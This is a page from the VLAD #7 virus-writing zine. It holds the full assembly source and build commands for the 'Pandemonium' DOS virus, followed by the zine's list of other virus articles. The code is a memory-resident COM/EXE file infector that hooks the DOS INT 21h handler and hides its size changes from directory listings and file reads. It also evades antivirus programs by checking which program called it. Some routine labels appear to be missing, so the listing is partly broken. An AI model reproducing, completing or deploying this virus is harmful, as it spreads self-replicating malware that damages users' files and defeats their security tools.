Virus Labs & Distribution
VLAD #7 - Pandemonium Virus

; com/exe tsr stealth. patches int 21 kernel. go res in umb.
; thanks lapse for insights.
; a86 virus.asm
; or
; tasm /m virus.asm | tlink virus.obj | exe2bin virus.exe virus.bin

bytesize = vend-vstart
parasize = (memend-vstart+0fh)/10h
.model  tiny
        org     0

vstart: mov     word ptr ds:[0],20cdh
        call    pushall
delta:  push    bp
        mov     bp,[bp+push_ret]
        call    install
        mov     bx,bp
        pop     bp
        mov     ax,[bp+push_ds]
markerloc = $
marker    = 1005h
        add     ax,10h
        add     cs:[bx+savecs-delta],ax
        add     cs:[bx+savess-delta],ax
        call    popall
        mov     sp,0fff0h
savess  =       $-2
        mov     ss,sp
        mov     sp,0fffeh
savesp  =       $-2
        db      0eah
saveip  dw      0
savecs  dw      0fff0h
        db      0dh,0ah,"pandemonium by retch",0dh,0ah
install:mov     ax,5802h
        int     21h
        push    ax
        mov     bx,1
        call    setstat
        mov     di,6h
        mov     ch,1
        jmp     short load
loadptr:mov     di,es:[di]
load:   les     di,es:[di]
next:   inc     di
        cmp     byte ptr es:[di-1],0eah
        jz      load
        cmp     word ptr es:[di-2],2effh
        jz      loadptr
        cmp     word ptr es:[di-4],0e18ah
        loopnz  next
        mov     al,es:[di-1]
        add     di,ax
        cmp     word ptr es:[di],0fc80h
        jnz     exitinstall
        mov     ax,es:[di+2]
        mov     cs:[bp+savecmp-delta],ax
        push    es
        push    di
        add     di,5
        mov     cs:[bp+i21_1+2-delta],es
        mov     cs:[bp+i21_2+2-delta],es
        mov     cs:[bp+i21_1-delta],di
        mov     al,es:[di-1]
        add     di,ax
        mov     cs:[bp+i21_2-delta],di
        xor     di,di
        mov     ax,5800h
        int     21h
        xchg    ax,cx
        mov     ax,5801h
        mov     bx,81h
        int     21h
alloc:  lea     ax,[di+4800h]
        mov     bx,parasize
        call    int21
        jnc     got_mem
        call    getpsp
        mov     es,bx
        call    mcb_es
        mov     bx,es:[di+3]
        sub     bx,parasize+1
        mov     es,ax
        lea     ax,[di+4a00h]
        call    int21
        jmp     short alloc
        pop     bx
setstat:mov     ax,5803h
        int     21h
got_mem:mov     es,ax
        mov     bx,cx
        mov     bh,0
        mov     ax,5801h
        int     21h
        call    mcb_es        
        mov     es:[di+1],ax
        mov     es,ax
        mov     cx,bytesize
        lea     si,[bp+vstart-delta]
        call    copy
        pop     di
        pop     ds
        mov     byte ptr [di],0eah
        mov     word ptr [di+1],offset newi21
        mov     [di+3],es
        jmp     short exitinstall
mcb_es: mov     ax,es
mcb_ax: dec     ax
        mov     es,ax
        inc     ax
copy:   lods    byte ptr cs:[si]
        stos    byte ptr [di]
        loop    copy

exiti21:call    popall
        jmp     emulateoldcode
int21:  pushf
        push    cs
        call    emulateoldcode
        cmp     ah,0
savecmp =       $-1
savejmp:jz      fixup
        db      0eah
i21_1   dd      0
fixup:  db      0eah
i21_2   dd      0

newi21: call    pushall
        call    checkcaller
        mov     di,offset i21tab-3
        db      0b9h
stealthmode dw  ?
findfnc:add     di,3
        cmp     ah,cs:[di]
        loopnz  findfnc
        mov     ax,cs:[di+1]
        jz      useit
        mov     ax,offset exiti21
useit:  push    ax
        mov     ax,[bp+push_ax]
        mov     cx,[bp+push_cx]
        mov     di,[bp+push_di]
i21tab: db      3dh
        dw      offset infectdx
        db      4bh
        dw      offset exec
        db      6ch
        dw      offset infectsi
nostealth = ($-i21tab)/3
        db      11h
        dw      offset fcbdir
        db      12h
        dw      offset fcbdir
        db      13h
        dw      offset delete
        db      3fh
        dw      offset read
        db      40h
        dw      offset write
        db      41h
        dw      offset unlink
        db      42h
        dw      offset lseek
        db      4eh
        dw      offset ascdir
        db      4fh
        dw      offset ascdir
        db      57h
        dw      offset time
allfunctions = ($-i21tab)/3

delete: mov     si,dx
        inc     si
        cmp     byte ptr [si-1],0ffh
        jnz     normal
        add     si,7
normal: push    cs
        pop     es
        mov     di,offset header
        mov     cx,8
        cmp     byte ptr ds:[si],' '
        loopnz  copynam
        lea     si,[bx+8]
        mov     al,'.'
        mov     byte ptr es:[di],0
        call    getdta
        push    es
        push    bx
        push    cs
        pop     ds
        mov     dx,offset dta
        mov     ah,1ah
        call    int21
        mov     dx,offset header
        mov     cx,8
        mov     ah,4eh
        cmp     ax,0
        org     $-2
fnext:  mov     ah,4fh
        call    int21
        jc      restdta
        mov     dx,offset dta+1eh
        call    open
        xchg    ax,bx
        jc      fnext
        call    disinf_handle
        call    close
        jmp     short fnext
restdta:pop     dx
        pop     ds
        mov     ah,1ah
        call    int21
        jmp     short exiti21_1

time:   cmp     al,1
        jz      setting_time
        call    popall
        call    int21
        call    pushall
        jc      donesub
        sub     dh,0c8h
        jb      donesub
        mov     byte ptr [bp+push_dx+1],dh
donesub:jmp     pop_retf2
        cmp     dh,0c8h
        jb      exiti21_1
        call    infecthandle
        jmp     short exiti21_1

unlink: call    open
        jc      exiti21_1
        xchg    ax,bx
        call    disinf_handle
        call    close
        jmp     short exiti21_1
write:  call    disinf_handle
        jmp     exiti21

        call    gettime
        jb      exit_disinf
        sub     dh,0c8h
        push    cx
        push    dx
        call    readoldheader
        mov     dx,0-bytesize
        mov     cx,-1
        mov     al,2
        call    ls
        xor     cx,cx
        mov     ah,40h
        call    int21
        call    ls_s
        call    wheader
        call    restorefp
        pop     dx
        pop     cx
        call    settime
read:   call    checkyears
        jb      exiti21_1
        call    readoldheader
        mov     cx,-1
        mov     dx,0-bytesize
        mov     al,2
        call    ls
        mov     cs:[vpos_hi],dx
        mov     cs:[vpos_lo],ax
        mov     dx,cs:[fp_hi]
        mov     ax,cs:[fp_lo]
        cmp     dx,cs:[vpos_hi]
        jb      adjust
        ja      inbody
        cmp     ax,cs:[vpos_lo]
        jae     inbody           
adjust: mov     cx,[bp+push_cx]
        add     ax,cx
        adc     dx,0
        cmp     dx,cs:[vpos_hi]
        jb      doread
        sub     ax,cs:[vpos_lo]
        jb      doread
        sub     cx,ax
        cmp     ax,0
        org     $-2
inbody: xor     cx,cx
doread: push    cx
nopush: call    restorefp
        pop     cx
        mov     dx,[bp+push_dx]
        mov     ds,[bp+push_ds]
        mov     ah,3fh
        call    int21
        call    saveret
        jc      doneread
        or      ax,ax
        jz      doneread
        cmp     word ptr cs:[fp_hi],0
        ja      doneread
        cmp     word ptr cs:[fp_lo],18h
        jae     doneread
        mov     si,cs:[fp_lo]
        push    ax
        add     ax,si
        cmp     ax,18h
        pop     ax
        jb      move
        mov     ax,si
        sub     ax,18h
        neg     ax
move:   xchg    ax,cx
        add     si,offset header
        mov     di,dx
        push    ds
        pop     es
        call    copy
        jmp     pop_retf2
vpos_hi dw      0
vpos_lo dw      0
saveret:mov     [bp+push_ax],ax
        jnc     sretnoc
        or      byte ptr [bp+push_f],1
        xor     cx,cx
        xor     dx,dx
        mov     al,1
        call    ls
        mov     word ptr cs:[fp_hi],dx
        mov     word ptr cs:[fp_lo],ax
        mov     al,2
        mov     cx,-1
        mov     dx,-18h
        call    ls
        call    rheader        
        db      0b9h
fp_hi   dw      0
        db      0bah
fp_lo   dw      0
        mov     al,0
        jmp     ls
lseek:  call    checkyears
        jb      doneadjust
        cmp     al,2
        jnz     doneadjust
        sub     dx,bytesize
        sbb     cx,0
        call    int21
        call    saveret
        jc      donelseek
        mov     [bp+push_dx],dx
        jmp     pop_retf2

        push    ax
        push    cx
        push    dx
        call    gettime
        pop     dx
        pop     cx
        pop     ax
exec:   cmp     al,1
        jz      clean
        jb      infectdx
        jmp     exiti21
clean:  call    popall
        mov     word ptr cs:[pblock],bx
        mov     word ptr cs:[pblock+2],es
        call    int21
        call    pushall
        les     di,cs:[pblock]
        add     di,0eh
        lds     si,es:[di+4]
        xor     cx,cx
        cmp     byte ptr [si],0e9h
        jnz     chkmark
        inc     cx
        add     si,ax
chkmark:cmp     word ptr [si+markerloc],marker
        jnz     pop_retf2
        jcxz    notcom
        mov     ax,[si+saveip]
        sub     ax,103h
        mov     ds:[101h],ax
        jmp     short pop_retf2
notcom: push    es:[di]
        push    es:[di+2]
        call    getpsp
        add     bx,10h
        add     word ptr [si+savecs],bx
        add     word ptr [si+savess],bx
        mov     ax,word ptr [si+savesp]
        dec     ax
        dec     ax
        mov     ax,word ptr [si+savess]
        mov     ax,word ptr [si+saveip]
        mov     ax,word ptr [si+savecs]
        pop     ds
        pop     si
        les     di,es:[di-8]
        call    popall
        retf    2
        mov     dx,si
        call    open
        jc      exiti21_2
        xchg    ax,bx
        call    infecthandle
        call    close
        jmp     exiti21

        xor     di,di
        call    gettime
        push    cx
        push    dx
        jae     time_exit
        call    rheader
        sub     byte ptr [si],0e9h
        jz      inf_com
        sub     word ptr [si],5a64h
        jz      inf_exe
        pop     dx
        pop     cx
        add     dx,di
        call    settime
inf_com:mov     ax,[si+1]
        add     ax,103h
        mov     word ptr [saveip],ax
        mov     word ptr [savesp],0fffeh
        mov     ax,0fff0h
        mov     word ptr [savecs],ax
        mov     word ptr [savess],ax
        call    ls_e
        or      dx,dx
        jnz     time_exit
        cmp     ax,0f000h
        ja      time_exit
        mov     byte ptr [si],0e9h
        sub     ax,3
        push    ax
        call    writevirus
        pop     [si+1]
        jc      time_exit
dohead: call    ls_s
        call    wheader
        mov     di,0c800h
j_te:   jmp     short time_exit
        call    read2
        cmp     word ptr [si],40h
        jz      time_exit
        call    read2
        cmp     word ptr [si],0
        jnz     time_exit
        mov     word ptr [si],'ZM'
        cmp     word ptr [si+0ch],-1
        jnz     time_exit
        push    [si+0eh]
        push    [si+10h]
        push    [si+14h]
        push    [si+16h]
        pop     word ptr [di+savecs]
        pop     word ptr [di+saveip]
        pop     word ptr [di+savesp]
        pop     word ptr [di+savess]
        call    ls_e
        push    dx
        push    ax
        call    writevirus
        jc      j_te
        mov     word ptr [si+0ah],0
        pop     ax
        pop     dx
        push    dx
        push    ax
        add     ax,bytesize
        adc     dx,0
        mov     cx,200h
        div     cx
        or      dx,dx
        jz      noinc
        inc     ax
noinc:  mov     [si+2],dx
        mov     [si+4],ax
        pop     ax
        pop     dx
        mov     cx,10h
        div     cx
        sub     ax,[si+8]
        mov     word ptr [si+14h],dx
        mov     word ptr [si+16h],ax
        inc     ax
        mov     word ptr [si+0eh],ax
        mov     word ptr [si+10h],(bytesize+150h) and 0ff00h
        jmp     dohead
        db      0,"17/04/96",0
fcbdir: call    popall
        call    int21
        call    pushall
        cmp     al,0
        jnz     go_pop_retf2
        call    getdta
        cmp     byte ptr es:[bx],-1
        jnz     noadd
        add     bx,7h
noadd:  add     bx,1dh
        lea     si,[bx-4]
        jmp     short checkifcomspec
ascdir: call    popall
        call    int21
        call    pushall
        jc      go_pop_retf2
        call    getdta
        add     bx,1ah
        lea     si,[bx-2]
        push    ax
        push    es
        push    bx
        call    getpsp
        mov     es,bx
        cmp     bx,es:[16h]
        pop     bx
        pop     es
        pop     ax
        jnz     go_pop_retf2
        cmp     byte ptr es:[si+1],al
        jb      go_pop_retf2
        sub     byte ptr es:[si+1],al
        sub     word ptr es:[bx],bytesize
        sbb     word ptr es:[bx+2],0
        jmp     pop_retf2
        push    bx
        push    ds
        push    ax
        push    si
        mov     word ptr cs:[stealthmode],allfunctions
        mov     ah,51h
        call    int21
        dec     bx
        mov     ds,bx
        mov     bx,word ptr ds:[0008h]
        mov     si,offset names
        cmp     si,offset endnam
        jz      exitcheckcaller
        lods    word ptr cs:[si]
        cmp     ax,bx
        jnz     searchnames
        mov     word ptr cs:[stealthmode],nostealth
        pop     si
        pop     ax
        pop     ds
        pop     bx
names   db      'F-'
        db      'TB'
        db      'AR'
        db      'RA'
        db      'LH'
        db      'PK'
        db      'CH'
read2:  mov     ah,3fh
        mov     cx,2
        jmp     short si_21
        mov     ah,40h
        mov     cx,bytesize
        jmp     short j_int21
gettime:mov     al,0
        cmp     ax,0
        org     $-2
settime:mov     al,1
        mov     ah,57h
        call    int21
        cmp     dh,0c8h
rheader:mov     ah,3fh
        cmp     ax,0
        org     $-2
wheader:mov     ah,40h
        mov     dx,offset header
        mov     cx,18h
si_21:  mov     si,dx
        push    cs
        pop     ds
        jmp     int21
ls_e:   mov     al,2
        cmp     ax,0
        org     $-2
ls_s:   mov     al,0
        xor     cx,cx
        xor     dx,dx
ls:     mov     ah,42h
        jmp     short j_int21
getdta: mov     ax,2fc8h
j_int21:jmp     int21
open:   mov     ax,3d02h
        cmp     ax,0
        org     $-2
close:  mov     ah,3eh
        cmp     ax,0
        org     $-2
getpsp: mov     ah,51h
        jmp     short j_int21

push_es =       00h
push_ds =       02h 
push_di =       04h
push_si =       06h
push_bp =       08h
push_bx =       0ah
push_dx =       0ch
push_cx =       0eh
push_ax =       10h
push_f  =       12h
push_ret =      14h
        push    ax
        push    cx
        push    dx
        push    bx
        push    bp
        push    si
        push    di
        push    ds
        push    es
        mov     bp,sp
        jmp     ss:[bp+push_ret]
popall: pop     ss:[bp+push_ret]
        pop     es
        pop     ds
        pop     di
        pop     si
        pop     bp
        pop     bx
        pop     dx
        pop     cx
        pop     ax
header  db      18h dup (0)
dta     db      2bh dup (0)
pblock  dd      0
        end     vstart


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No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals


VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus


Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

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